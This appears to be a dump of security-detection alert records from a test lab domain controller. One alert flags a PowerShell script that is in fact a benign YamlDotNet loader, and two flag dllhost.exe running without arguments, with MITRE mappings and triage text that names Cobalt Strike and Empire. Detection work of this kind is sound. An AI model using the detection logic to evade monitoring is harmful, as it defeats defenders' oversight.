UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-01T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-01T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664665200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664665200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2480", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664665200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664665200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x9b0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64."